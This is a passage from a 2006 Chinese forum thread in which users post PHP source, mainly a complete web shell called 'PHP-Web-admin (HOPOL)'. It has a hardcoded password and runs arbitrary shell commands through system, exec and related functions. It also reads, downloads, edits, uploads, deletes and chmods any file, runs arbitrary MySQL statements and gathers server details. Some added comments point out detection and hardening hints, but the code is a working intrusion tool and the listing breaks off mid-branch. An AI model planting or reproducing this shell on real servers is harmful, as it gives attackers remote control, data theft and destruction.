   echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
   echo "  </tr>\n";
  }

  // Echoes a hidden input.
  function makehidden($name,$value=''){
   echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
  }

  // Returns (does not echo) an <input> tag; class="input" is added only when
  // $css is left at its default.
  function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
   $css = ($css == 'input') ? " class=\"input\"" : "";
   $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
   return $input;
  }

  // Returns (does not echo) a <textarea> with $content as its body.
  function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
   $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
   return $textarea;
  }

  // Echoes the submit row and closes the form; a non-empty $over also closes
  // the surrounding table.
  function formfooter($over='',$height=''){
   $height = empty($height) ? "" : " height=\"".$height."\"";
   echo "  <tr class=\"secondalt\">\n";
   echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"确定\"></td>\n";
   echo "  </tr>\n";
   echo " </form>\n";
   echo $end = empty($over) ? "" : "</table>\n";
  }

  // Returns a <select>. Keys of $arg read here: multiple, size, css, name,
  // option (value => label map) and selected (a single key, or an array in
  // which selected keys map to 1).
  function makeselect($arg = array()){
   if ($arg[multiple]==1) {
    $multiple = " multiple";
    if ($arg[size]>0) {
     $size = "size=$arg[size]";
    }
   }
   if ($arg[css]==0) {
    $css = "class=\"input\"";
   }
   $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
    if (is_array($arg[option])) {
     foreach ($arg[option] AS $key=>$value) {
      if (!is_array($arg[selected])) {
       // Loose comparison between the selected key and the option key.
       if ($arg[selected]==$key) {
        $select .= "<option value=\"$key\" selected>$value</option>\n";
       } else {
        $select .= "<option value=\"$key\">$value</option>\n";
       }

      } elseif (is_array($arg[selected])) {
       if ($arg[selected][$key]==1) {
        $select .= "<option value=\"$key\" selected>$value</option>\n";
       } else {
        $select .= "<option value=\"$key\">$value</option>\n";
       }
      }
     }
    }
   $select .= "</select>\n";
   return $select;
  }
 }
?>

[此贴子已经被作者于2006-5-10 20:21:58编辑过]

顶上去...

  偶又坐沙发...

 爽...

是不错

给你补一个.

<?php
// Request bootstrap: no execution time limit, errors reduced to
// E_ERROR | E_WARNING | E_PARSE, output buffered, start time recorded.
@set_time_limit(0);
@error_reporting(E_ERROR | E_WARNING | E_PARSE);
@ob_start();
$pagestarttime = microtime();

// Undo magic_quotes_gpc escaping on request data.
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0.
if (get_magic_quotes_gpc()) {
    $_GET = array_stripslashes($_GET);
    $_POST = array_stripslashes($_POST);
}

///// Settings
// The access password is a literal in the file, so a file-content sweep of a
// web root can match on these variable names and the default value.

$chkpassword = 1;// whether password checking is enabled

$my_password = "suiyuelianmeng";// the password; has no effect when chkpassword is 0

$cookit_time = 24;// cookie lifetime in hours (one day = 24)

////// End of settings

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP-Web-admin(HOPOL版本)</title>
    <style type="text/css">
    <!--
    body,td,th, h1, h2 {
        font-size: 12px;
        font-family: sans-serif;
    }
    body {background-color: #F8F8F8;}
    .style1 {
        font-size: 12px;
        font-family: verdana, helvetica, sans-serif, 宋体;
        vertical-align: middle;
        border: 1px solid #000000;
    }
    .stylebtext2 {color: #990000;font-weight: bold;}
    .stylebtext3 {color: #FFFFFF;font-weight: bold;}
     a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
     a:hover {COLOR: #990000;text-decoration: none;}
    table {border-collapse: collapse;}
    td, th { border: 1px solid #000000;}
    -->
</style>

<?

// Access gate for the panel; runs only when $chkpassword is 1.
//  - ?action=logout drops the session entry and blanks the cmy_password cookie.
//  - ?action=login compares POST field pmy_password with $my_password (loose ==).
//  - On success the password itself is stored in $_SESSION["smy_password"] and
//    in the cmy_password cookie, so it travels in clear text in every later
//    Cookie header. That cookie name is a practical indicator when reviewing
//    proxy or web-server logs.
// NOTE(review): session_register(), session_unregister() and
// session_is_registered() were removed in PHP 5.4.
// getloginpass() is not defined in the part of the listing shown here.
if($chkpassword == 1){
 @session_start();
 if ($_GET["action"] == "logout") {
  @session_unregister("smy_password");
  @session_destroy();
  @setcookie ("cmy_password","");
  echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
 }
 if($_GET["action"] == "login"){
  if($my_password==$_POST["pmy_password"]){
   @session_register("smy_password");
   $_SESSION["smy_password"] = $my_password;
   @setcookie ("cmy_password",$my_password,time()+(3600*$cookit_time));
   echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
  }
 }
 // Show the login form unless the session value or the cookie matches.
 if (@session_is_registered("smy_password")||isset($_COOKIE["cmy_password"])){
  if (($_SESSION["smy_password"]!=$my_password)&&(!isset($_COOKIE["cmy_password"])||$_COOKIE["cmy_password"]!=$my_password))
   getloginpass();
 }else getloginpass();
}

// Emulates register_globals when it is off: every GET, POST and uploaded-file
// field becomes a global variable of the same name. There is no allow-list
// and existing variables are overwritten. The code below reads request input
// only through these bare variables ($action, $dir, $df_path, ...), so the
// request parameter names map one-to-one onto the variable names used there.
if(!@get_cfg_var("register_globals")){
    foreach($_GET as $key => $val) $$key = $val;
    foreach($_POST as $key => $val) $$key = $val;
 foreach($_FILES as $key => $val) $$key = $val;
}

// File download: when the request carries df_path, the named file is read in
// full and sent as an attachment, then the script exits. The path is used
// exactly as supplied, so any file readable by the web-server account can be
// fetched. In access logs this appears as a request with a df_path parameter.
// NOTE(review): "Accept-Length" is not a standard response header.
if(isset($df_path)){
    if (!file_exists($df_path)) $errordownload = "没找到文件";
    else {
        $df_name = basename($df_path);
        $df_fhd=fopen($df_path,"rb");
        if($df_fhd==false) $errordownload = "打开文件错误";
        else{
            Header("Content-type: application/octet-stream");
            Header("Accept-Ranges: bytes");
            Header("Accept-Length: ".filesize($df_path));
            Header("Content-Disposition: attachment; filename=".$df_name);
            echo fread($df_fhd,filesize($df_path));
            fclose($df_fhd);
            exit;
        }
    }
}

// Work out the directory to display. A non-empty gotodir overrides dir; with
// no action at all the page defaults to listing ".".
if(isset($gotodir)) if($gotodir != "") $dir=$gotodir;

if(!isset($action)) {
    $action = "dir";
    $dir = ".";
}

if(!isset($dir)) $dir = ".";

// Only a doubled backslash is replaced here.
$rootdir = str_replace("\\\\","/",$_SERVER["DOCUMENT_ROOT"]);

// abspath switches to the resolved absolute path; unabspath maps a path under
// the document root back to "." and falls back to "." for anything else.
if(isset($abspath)) $dir = gettruepath($dir);
else if(isset($unabspath)){
    $dir = gettruepath($dir);
    if(strstr($dir,$rootdir)) $dir = str_replace("$rootdir",".",$dir); 
    else $dir=".";
}
// Green / red markers, used by the environment page as its supported / unsupported legend.
$rny="<font color=green><b>■</b></font>";$rnn="<font color=red><b>■</b></font>";

?>

<SCRIPT LANGUAGE="JavaScript">
// Asks for confirmation, then navigates to `url` with the path `msg` appended.
// `smsg` is assigned without a declaration, as in the rest of this page.
function rusuredel(msg,url){
    smsg = "确实要删除文件(目录)[" + msg + "]吗?";
    if (!confirm(smsg)){
        return;
    }
    url += msg;
    window.location = url;
}

// Prompts for a target value (pre-filled with `msg`) and, when one is given,
// navigates to `url` with that value appended.
// `smsg` and `re` are assigned without a declaration, as in the rest of this page.
function rusurechk(msg,url){
    smsg = "源文件(目录,属性)为[" + msg + "],请输入目标文件(目录,属性):";
    re = prompt(smsg,msg);
    if (!re){
        return;
    }
    url += re;
    window.location = url;
}
</script>
</head>
<body>

<table width="100%" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align="center" width="100%" bgcolor="#000000" class="stylebtext3">
            欢迎使用PHP-WEB-ADMIN(hopol版本)【切莫用于任何非法途径否则后果自负】
        </td>
    </tr>
    <tr>
        <td align="center" bgcolor="#EEEEEE">
            本文件绝对路径:<? $stmp =str_replace("\\","/", __FILE__);echo "【<a href=\"$HTTP_SERVER_VARS[PHP_SELF]\">$stmp</a>】";?>【<a href="?action=logout">点此注销会话</a>】
        </td>
    </tr>
    <tr>
        <td align="center"  bgcolor="#EEEEEE">【<a href="?action=dir&dir=.">文件管理</a>】【<a href="?action=editfile&dir=<?=urlencode($dir);?>&editfile=<?=urlencode($dir);?>/">文本编辑器</a>】【<a href="?action=sql">数据库查询</a>】【<a href="?action=shell">Shell命令</a>】【<a href="?action=env">环境变量</a>】【<a href="?action=phpinfo">PHP系统信息</a>】【<a href="http://bbs.18883.net">查看更新</a>】
        </td>
    </tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
 <tr>
  <td width="100%" bgcolor="#000000" align="center" class="stylebtext3">
<?if($action == "dir"){?>
 文件管理
 </td>
 </tr>

 <tr>
 <form method="post" action="?action=dir&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;当前目录:&nbsp;
 <input name="gotodir" type="text" class="style1" value="<?=$dir?>" size="60">&nbsp;
 <input name="gotodirb" type="submit" class="style1" value="跳转"><?if($dir[1] == ':') echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&unabspath=1\">点此用<b>相对</b>路径查看</a>】&nbsp;";else echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&abspath=1\">点此用<b>绝对</b>路径查看</a>】&nbsp;";?>
 </td>
 </form>
 </tr>

 <tr>
 <form method="post" action="?action=fileup&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;文件上传到(目录):
 <input name="filedir" type="text" class="style1" value="<?=$dir?>" size="30">&nbsp;本地文件:
 <input name="userfile" type="file" class="style1" size="30">&nbsp;
 <input name="userfileb" type="submit" class="style1" value="上传">
 </td>
 </form>
 </tr>

 <tr>
 <form method="post" action="?action=filecreate&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;新建文件(目录)在当前目录:&nbsp;
 <input name="mkname" type="text" value="" size=30 class="style1">&nbsp;
 <input name="mkfileb" type="submit" value="新建文件" class="style1">&nbsp;
 <input name="mkdirb" type="submit" value="新建目录" class="style1">&nbsp;当前目录状态:【<b><?$write = "不可写";if(is_dir($dir)) {if ($fp = @fopen("$dir/temp.tmp", 'w')) {@fclose($fp);@unlink("$dir/temp.tmp");$write = "可写";}}echo "$write</b>】";?>
 </td>
 </tr>
 </table>

 <table width="100%" border="0" cellpadding="0" cellspacing="0">
 <tr bgcolor="#000000" class="stylebtext3">
  <td width="25%">文件名</td>
  <td width="40%">建立时间|最后修改时间</td>
  <td width="10%">大小(KB)</td>
  <td width="8%">属性</td>
  <td width="17%">操作</td>
 </tr>
 <?php
 $filesum=0;$dirsum=0;$color="#EEEEEE";
 $dirs=@opendir($dir);
 while ($lop_fname=@readdir($dirs)){
  if(@is_dir("$dir/$lop_fname")){
   $lop_fsize = "-";
   $lop_fcdata = "-";
   $lop_fmdata = "-";
   $lop_foper="-";
   $lop_ftype="-";
   if($lop_fname==".."){
    if($dir == ".") continue;
    $dirb=@dirname($dir);
    if($dir[1] ==':'){
     $dirb = gettruepath($dirb);
     if(strlen($dirb) <=3) $dirb = substr($dirb,0,2);
    }
    $bp="△ ";
    $lop_fname = "上级目录";
   }else if($lop_fname=="."){
    if($dir == ".") continue;
    $dir[1] ==':'?$dirb = substr(gettruepath($dirb),0,2):$dirb=$lop_fname;
    $bp="○ ";
    $lop_fname = "根级目录";
   }else{
    $lop_fsize = "[DIR]";
    $dirb="$dir/$lop_fname";   
    $lop_fcdata = @date("Y-n-d H:i:s",@filectime("$dirb"));
    $lop_fmdata = @date("Y-n-d H:i:s",@filemtime("$dirb"));
    $lop_ftype= substr(@base_convert(@fileperms($dirb),10,8),-4);
    $bp="□ ";
    $title = "点击进入文件夹[$lop_fname]";
    $lop_foper= "[<a href=\"删除\" title=\"删除整个文件夹\" onClick=\"rusuredel('$dirb','?action=filedel&dir=$dir&deldir=');return false;\">删</a>|".
       "<a href=\"重命名\" title=\"重命名\" onClick=\"rusurechk('$dirb','?action=filerename&dir=$dir&renamef=$dirb&renamet=');return false;\">重</a>|".
       "<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dirb','?action=filecopy&dir=$dir&copydirf=$dirb&copydirt=');return false;\">拷</a>|".
       "<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&ctype=');return false;\">属</a>]";
    $dirsum++;
   }
   $color=ch_color($color);
   echo    "<tr bgcolor=\"$color\">".
       "<td width=\"25%\">$bp [<a href=\"?action=dir&dir=$dirb\" title = \"进入\">$lop_fname</a>]</td>".
       "<td width=\"40%\">[$lop_fcdata|$lop_fmdata]</td>".
       "<td width=\"10%\">$lop_fsize</td>".
       "<td width=\"8%\">$lop_ftype</td>".
       "<td width=\"17%\">$lop_foper</td>".
      "</tr>";
  }
 }
 @closedir($dirs);
 $dirs=@opendir($dir);
 while ($lop_fname=@readdir($dirs)){
  if(!@is_dir("$dir/$lop_fname")&&$lop_fname!=".."){
   $lop_ftype= substr(@base_convert(@fileperms("$dir/$lop_fname"),10,8),-4);
   $lop_foper= "[<a href=\"删除\" title=\"删除\" onClick=\"rusuredel('$dir/$lop_fname','?action=filedel&dir=$dir&delfile=');return false;\">删</a>|".
      "<a href=\"重命名\" title=\"重命名\"  onClick=\"rusurechk('$dir/$lop_fname','?action=filerename&dir=$dir&renamef=$dir/$lop_fname&renamet=');return false;\">重</a>|".
      "<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dir/$lop_fname','?action=filecopy&dir=$dir&copyfilef=$dir/$lop_fname&copyfilet=');return false;\">拷</a>|".
      "<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&cfile=$dir/$lop_fname&ctype=');return false;\">属</a>|".
      "<a href=\"?action=dir&df_path=$dir/$lop_fname\" title=\"下载\">下</a>|".
      "<a href=\"?action=editfile&dir=$dir&editfile=$dir/$lop_fname\" title=\"编辑\">编</a>]";
   $color=ch_color($color);
   echo    "<tr bgcolor=\"$color\">".
       "<td width=\"25%\">■ <a href=\"$dir/$lop_fname\" title = \"新窗口中打开\" target=\"_blank\">$lop_fname</a></td>".
       "<td width=\"40%\">[".@date("Y-n-d H:i:s",@filectime("$dir/$lop_fname"))."|".@date("Y-n-d H:i:s",@filemtime("$dir/$lop_fname"))."]</td>".
       "<td width=\"10%\">".@number_format(@filesize("$dir/$lop_fname")/1024,3)."</td>".
       "<td width=\"8%\">".$lop_ftype."</td>".
       "<td width=\"17%\">$lop_foper</td>".
      "</tr>";
   $filesum++;
  }
 }
 @closedir($dirs);
 ?>           
 <tr bgcolor="#000000" class="stylebtext3" align="center">
  <td width="25%" colspan="5">目录数:<?=$dirsum?>,文件数:<?=$filesum?></td>
 </tr>
 </table>     
<?}else if ($action == "editfile"){?>
 文本编辑器(若目标文件不存在将新建新文件)
 </td>
 </tr>

 <tr>
 <form method="post" action="?action=filesave&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">当前编辑文件名:
   <input name="editfilename" type="text" class="style1" value="<?=$editfile?>" size="30">
   <input name="editbackfile" type="checkbox" value="1" class="style1">生成备份文件(原文件.bak)<br>
   <textarea name="editfiletext" cols="120" rows="25" class="style1"><?
    // Reads the file named by the request variable $editfile and prints it,
    // HTML-escaped, into the edit box. The path is used as supplied, so any
    // file readable by the web-server account can be viewed this way.
    $fd = @fopen($editfile, "rb");
    // On failure the textarea shows a fixed error string instead of contents.
    $fd==false?$readfbuff = "读取文件错误(或尚未读取文件).":$readfbuff = @fread($fd, filesize($editfile));
    @fclose( $fd );
    $readfbuff = htmlspecialchars($readfbuff);
    echo "$readfbuff";
   ?></textarea><p>
   <input name="editfileb" type="submit" value="提交" class="style1">&nbsp;&nbsp;
   <input name="editagainb" type="reset" value="重置" class="style1">
   <a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
   <p>
  </td>
 </form>
 </tr>
 </table>
<?}else if("sql" == substr($action,0,3)){?>
 数据库查询
 </td>
 </tr>
 
 <tr>
 <form method="post" action="?action=sql" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">
   数据库地址:<input name="sqlhost" type="text" class="style1" value="<?=isset($sqlhost)?$sqlhost:"localhost"?>" size="20">
   端口:<input name="sqlport" type="text" class="style1" value="<?=isset($sqlport)?$sqlport:"3306"?>" size="5">
   用户名:<input name="sqluser" type="text" class="style1" value="<?=isset($sqluser)?$sqluser:"root"?>" size="10">
   密码:<input name="sqlpasd" type="text" class="style1" value="<?=isset($sqlpasd)?$sqlpasd:""?>" size="10">
   数据库名:<input name="sqldb" type="text" class="style1" value="<?=isset($sqldb)?$sqldb:""?>" size="10"><br>
   <textarea name="sqlcmdtext" cols="120" rows="10" class="style1"><?
    // Connects to the MySQL server given in the form (host, port, user,
    // password, database) and runs the submitted statement verbatim through
    // the legacy mysql_* extension (removed in PHP 7.0). Only success or
    // failure is reported; the statement text is echoed back unescaped.
    // For defenders: outbound database logins from the web-server account with
    // credentials the application does not use are the thing to look for in
    // database audit logs.
    if(!empty($sqlcmdtext)){
     @mysql_connect("{$sqlhost}:{$sqlport}","$sqluser","$sqlpasd") or die("数据库连接失败");
     @mysql_select_db("$sqldb") or die("选择数据库失败");
     $res = @mysql_query("$sqlcmdtext");
     echo $sqlcmdtext;
     mysql_close();
    }
   ?></textarea><p>
   <span class="stylebtext2"><?echo isset($sqlcmdb)?($res?"执行成功.":"执行失败:".mysql_error()):"";?></span><p>
   <input name="sqlcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
   <input name="sqlagainb" type="reset" value="重置" class="style1">
   <p>
  </td>
 </form>
 </tr>
 </table>
<?}else if("shell" == substr($action,0,5)){?>
 Shell命令
 </td>
 </tr>

 <tr>
  <form method="post" action="?action=shell" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">
   函数:<select name="seletefunc" class="input">
    <option value="system" <?=($seletefunc=="system")?"selected":"";?>>system</option>
    <option value="exec" <?=($seletefunc=="exec")?"selected":"";?>>exec</option>
    <option value="shell_exec" <?=($seletefunc=="shell_exec")?"selected":"";?>>shell_exec</option>
    <option value="passthru" <?=($seletefunc=="passthru")?"selected":"";?>>passthru</option>
    <option value="popen" <?=($seletefunc=="popen")?"selected":"";?>>popen</option>
   </select>
   命令:<input name="shellcmd" type="text" class="style1" value="<?=isset($shellcmd)?$shellcmd:""?>" size="80">
   <textarea name="shelltext" cols="120" rows="10" class="style1"><?
    // Passes the request field shellcmd, unchanged, to the PHP function chosen
    // in the `seletefunc` field and prints the result into the textarea.
    // Hardening: the functions reached from here are system, exec, shell_exec,
    // passthru and popen; listing them in php.ini disable_functions makes this
    // branch fail. Detection: the POST field names shellcmd and seletefunc
    // (note the spelling) are distinctive enough for a WAF or log rule, and
    // the web-server account spawning a shell is visible in process auditing.
    if(!empty($shellcmd)){
     if($seletefunc=="popen"){
      // popen branch: at most 2096 bytes of output are read.
      $pp = popen($shellcmd, 'r');
      echo fread($pp, 2096);
      pclose($pp);
     }else{
      // Any value other than the four names below falls through to system().
      echo $out =  ("system"==$seletefunc)?system($shellcmd):(($seletefunc=="exec")?exec($shellcmd):(($seletefunc=="shell_exec")?shell_exec($shellcmd):(($seletefunc=="passthru")?passthru($shellcmd):system($shellcmd)))); 
     }
    }
   ?></textarea><p>
   <span class="stylebtext2"><?echo get_cfg_var("safe_mode")?"提示:安全模式下可能无法执行":"";?></span><p>
   <input name="shellcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
   <input name="shellagainb" type="reset" value="重置" class="style1">
   <p>
 </td>
 </form>
 </tr>
 </table>
<?}else if($action=="phpinfo"){?>
 PHP系统信息
 </td>
 </tr>

 <tr>
 <td align="center" bgcolor="#EEEEEE" class="stylebtext2"><br><?phpinfo();
  if(eregi("phpinfo",get_cfg_var("disable_functions"))) echo "<b>phpinfo函数被禁止</b><br>";
 ?><br>
 </td>
 </tr>
 </table>
<?}else if("file" == substr($action,0,4)){?>
 系统消息
 </td>
 </tr>

 <tr>
 <td align="center" bgcolor="#EEEEEE" class="stylebtext2">
 <br>
 <?
  // Dispatcher for every file operation. All paths come straight from request
  // variables and are used as supplied; none is confined to a base directory.
  // The parameter names below (editfilename, deldir, delfile, renamef/renamet,
  // copydirf/copydirt, copyfilef/copyfilet, mkname, cfile/ctype, filedir,
  // userfile) are what to search for in request logs.

  // filesave: overwrite (or create) editfilename with the submitted text.
  // NOTE(review): both outcomes of the backup copy print the same "success" text.
  if($action == "filesave"){
   if(isset($editfileb)&&isset($editfilename)){
    if(isset($editbackfile)&&($editbackfile == 1))
     echo $out = @copy($editfilename,$editfilename.".bak")?"生成备份文件成功.<p>":"生成备份文件成功<p>";
    $fd = @fopen($editfilename, "w");
    if($fd == false) echo "打开文件[$editfilename]错误.";
    else{
     echo $out=@fwrite($fd,$editfiletext)?"编辑文件[$editfilename]成功!":"写入文件文件[$editfilename]错误";
     @fclose( $fd );
    }
   }
  // filedel: recursive directory delete, or chmod 0777 followed by unlink.
  }else if($action == "filedel"){
   if(isset($deldir)) {
    echo $out = file_exists($deldir)?(deltree($deldir)?"删除目录[$deldir]成功!":"删除目录[$deldir]失败!"):"目录[$deldir]不存在!!";
   }else if(isset($delfile)){
    @chmod("$delfile", 0777);
    echo $out = file_exists($delfile)?(@unlink($delfile)?"删除文件[$delfile]成功!":"删除文件[$delfile]失败!"):"文件[$delfile]不存在!";
   }
  // filerename: rename() from renamef to renamet.
  }else if($action == "filerename"){
   echo $out = file_exists($renamef)?(@rename($renamef,$renamet)?"重命名[$renamef]为[{$renamet}]成功":"重命名[$renamef]为[{$renamet}]失败"):"文件[$renamef]不存在!";
  // filecopy: copy a tree or a single file; truepath() creates missing target directories.
  }else if($action =="filecopy") {
   if(isset($copydirf)&&isset($copydirt)){
    echo $out = file_exists($copydirf)?(truepath($copydirt)?(copydir($copydirf,$copydirt)?"拷贝目录[$copydirf]到[$copydirt]成功":"拷贝目录[$copydirf]到[$copydirt]失败"):"目标目录[$copydirt]不存在且创建错误"):"目录[$copydirf]不存在!";
   }else if(isset($copyfilef)&&isset($copyfilet)){
    echo $out = file_exists($copyfilef)?(truepath(dirname($copyfilet))?(@copy($copyfilef,$copyfilet)?"拷贝文件[$copyfilef]到[$copyfilet]成功":"拷贝文件[$copyfilef]到[$copyfilet]失败"):"目标目录不存在且创建错误"):"源文件[$copyfilef]不存在!";
   }
  // filecreate: make a directory (mode 0777) or an empty file under $dir.
  }else if($action == "filecreate"){
   if(isset($mkdirb)){
    echo $out = file_exists("$dir/$mkname")?"[{$dir}/{$mkname}]该目录已存在":(@mkdir("$dir/$mkname",0777)?"目录[$mkname]创建成功":"目录[$mkname]创建失败");
   }else if(isset($mkfileb)){
    if(file_exists("$dir/$mkname")) echo "[$dir/$mkname]该文件已存在";
    else{
     $fd = @fopen("$dir/$mkname", "w");
     if($fd == false) echo "建立文件[$mkname]错误.";
     else{
      echo "建立文件[$mkname]成功 <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($dir)."/".urlencode($mkname)."\"><p>点此跳转入编辑浏览页面</a>";
      @fclose( $fd );
     }
    }
   }
  // filetype: chmod cfile to the octal mode given in ctype.
  }else if($action == "filetype"){
   echo $out=@chmod($cfile,base_convert($ctype,8,10))?"更改成功!":"更改失败!";
  // fileup: the uploaded temp file is copied to filedir under the client-supplied
  // name; there is no is_uploaded_file() check and no extension filtering.
  }else if($action == "fileup"){
   echo  $out = @copy($userfile["tmp_name"],"{$filedir}/{$userfile['name']}")?"上传文件[{$userfile['name']}]成功.位置:[{$filedir}/{$userfile['name']}]共({$userfile['size']})字节.":"上传文件[{$userfile['name']}]失败";
  }else{
   echo "错误的提交参数action.";
  }
 ?>
 <p>
 <a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
 <p>
 </td>
 </tr>
 </table>

<?}else if($action=="env"){?>
 环境变量&nbsp;&nbsp;<?=$rny?>支持&nbsp;&nbsp;<?=$rnn?>不支持<br>
 </td>
 </tr>
 <?
 $sinfo[0] = array("主机域名:",$_SERVER["SERVER_NAME"]);
 $sinfo[1] = array("主机IP:",gethostbyname($_SERVER["SERVER_NAME"]));
 $sinfo[2] = array("主机端口:",$_SERVER["SERVER_PORT"]);
 $sinfo[3] = array("主机时间:",date("Y/m/d_h:i:s",time()));
 $sinfo[4] = array("主机系统:",PHP_OS);
 $sinfo[5] = array("主机WEB服务器",$_SERVER["SERVER_SOFTWARE"]);
 $sinfo[6] = array("PHP版本:",PHP_VERSION);
 $sinfo[7] = array("剩余空间:",intval(diskfreespace(".") / (1024 * 1024).'MB'));
 $sinfo[8] = array("主机语言",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
 $sinfo[9] = array("当前用户",get_current_user());
 $sinfo[10] = array("最大内存占用:",my_func("memory_limit",1));
 $sinfo[11] = array("最大单个上传文件",my_func("upload_max_filesize",1));
 $sinfo[12] = array("POST最大容量",my_func("post_max_size",1));
 $sinfo[13] = array("脚本超时",my_func("max_execution_time",1));
 $sinfo[14] = array("屏蔽的函数",my_func("disable_functions",1));

 $ssql[0] = array("MYSQL",my_func("mysql_close",2));
 $ssql[1] = array("Oracle",my_func("ora_close",2));
 $ssql[2] = array("Oracle 8",my_func("OCILogOff",2));
 $ssql[3] = array("OBDC",my_func("odbc_close",2));
 $ssql[4] = array("SyBase",my_func("sybase_close",2));
 $ssql[5] = array("SQL_Server",my_func("mssql_close",2));
 $ssql[6] = array("DBase",my_func("dbase_close",2));
 $ssql[7] = array("Hyperwave",my_func("hw_close",2));
 $ssql[8] = array("Postgre_SQL",my_func("pg_close",2));

 $sobj[0] = array("Session支持",my_func("session_start",2));
 $sobj[1] = array("Socket支持",my_func("fsockopen",2));
 $sobj[2] = array("压缩文件支持(Zlib)",my_func("gzclose",2));
 $sobj[3] = array("SMTP支持",my_func("smtp",2));
 $sobj[4] = array("XML支持",my_func("XML Support",3));
 $sobj[5] = array("FTP支持",my_func("FTP support",3));
 $sobj[6] = array("Sendmail支持",my_func("Internal Sendmail Support for Windows 4",3));
 $sobj[7] = array("SNMP支持",my_func("snmpget",2));
 $sobj[8] = array("PDF文档支持",my_func("pdf_close",2));
 $sobj[9] = array("IMAP电子邮件支持",my_func("imap_close",2));
 $sobj[10] = array("图形处理GD Library支持",my_func("imageline",2));
 $sobj[11] = array("ZEND支持",my_func("zend_version",2)."(".zend_version().")");

 $sobj[12] = array("允许使用URL打开文件",my_func("allow_url_fopen",2));
 $sobj[13] = array("PREL相容语法 PCRE",my_func("preg_match",2));
 $sobj[14] = array("显示错误信息",my_func("display_errors",2));
 $sobj[15] = array("自动定义全局变量",my_func("register_globals",2));
 $sobj[16] = array("PHP运行方式",strtoupper(php_sapi_name()));
 ?>

 <tr>
 <td align="center" bgcolor="#EEEEEE">
  <table width="600" border="0" cellpadding="0" cellspacing="0"><br>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">主机信息</td></tr>
   <?
   for($i=0;$i<15;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$sinfo[$i][0]}</td><td>{$sinfo[$i][1]}</td></tr>";  
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">数据库支持信息</td></tr>
   <?
   for($i=0;$i<9;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$ssql[$i][0]}</td><td>{$ssql[$i][1]}</td></tr>";  
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">组件和其他信息</td></tr>
   <?
   for($i=0;$i<17;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$sobj[$i][0]}</td><td>{$sobj[$i][1]}</td></tr>";
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">自定义查看PHP配置参数(多个参数可用","逗号隔开)</td></tr>
   <tr bgcolor="#EEEEEE">
   <form method="post" action="?action=env" enctype="multipart/form-data">
    <td colspan="2">请输入参数的ProgId或ClassId:
     <input name="envname" type="text" size="50" class="style1" value=<?=isset($envname)?$envname:"";?>>
     <input name="envnameb" type="submit" value="查看" class="style1">
    </td>
   </form>
   </tr>
   <?
    if(isset($envname)&&!empty($envname)){
     $envname=explode(",", $envname);
     $i=0;
     while($envname[$i]){
      echo "<tr bgcolor=\"#CCCCCC\"><td colspan=\"2\">查询[{$envname[$i]}]如下:</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_cfg_var方式</td><td>". my_func($envname[$i],1)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>function_exists方式</td><td>". my_func($envname[$i],2)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_gpc方式</td><td>". my_func($envname[$i],3)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_runtime方式</td><td>". my_func($envname[$i],4)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Getenv方式</td><td>". my_func($envname[$i],5)."</td></tr>"; 
      $i++;
     }
    }
   ?>
  </table><br>
 </td>
 </tr>
 </table>
<?}else{
